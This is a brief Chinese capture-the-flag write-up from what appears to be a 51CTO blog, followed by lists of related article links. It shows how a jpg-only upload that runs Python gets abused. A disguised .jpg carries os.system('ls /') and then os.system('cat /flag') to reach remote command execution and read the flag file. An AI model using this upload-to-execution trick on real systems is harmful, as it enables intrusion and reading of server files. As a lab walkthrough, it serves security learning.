一、题目:

 

 二、查看网页源码:

获取上传文件仅:jpg、png,且说明上传python

 

 三、使用vim创建包含python代码的jpg文件

import os

os.system('ls /')

 

上传成功,存在远程执行漏洞 

 

 查看flag

import os

os.system('cat /flag')

 

 


©著作权归作者所有:来自51CTO博客作者风缘2017的原创作品,如需转载,请注明出处,否则将追究法律责任

更多相关文章

  1. mysql数据库题目
  2. tp6 多文件上传
  3. 上传自己的镜像被拒绝denied: requested access to the resource
  4. pod一直处于ContainerCreating状态,
  5. 社区版本idea查看继承关系的骚操作
  6. docker安装
  7. webuploader文件上传到哪里的问题
  8. 解决 Jenkins Artifactory Plugin 在 AIX 上传制品失败的问题
  9. MongoDB Server对于Sort排序能够支持的最大内存限制查看

随机推荐

  1. android中一些能在国外使用的第三方地图
  2. 关于selenium android下的浏览器测试
  3. Android中的AlertDialog使用示例四(多项选
  4. 屏幕中央的TextView [重复]
  5. [置顶] Android 开发笔记
  6. android 利用广播实现程序的强制退出
  7. android 平台的RNDIS功能
  8. 关于activity之间及activity与baseAdapte
  9. MSM7627的内存分布图
  10. Android如何缩放应用中的字体大小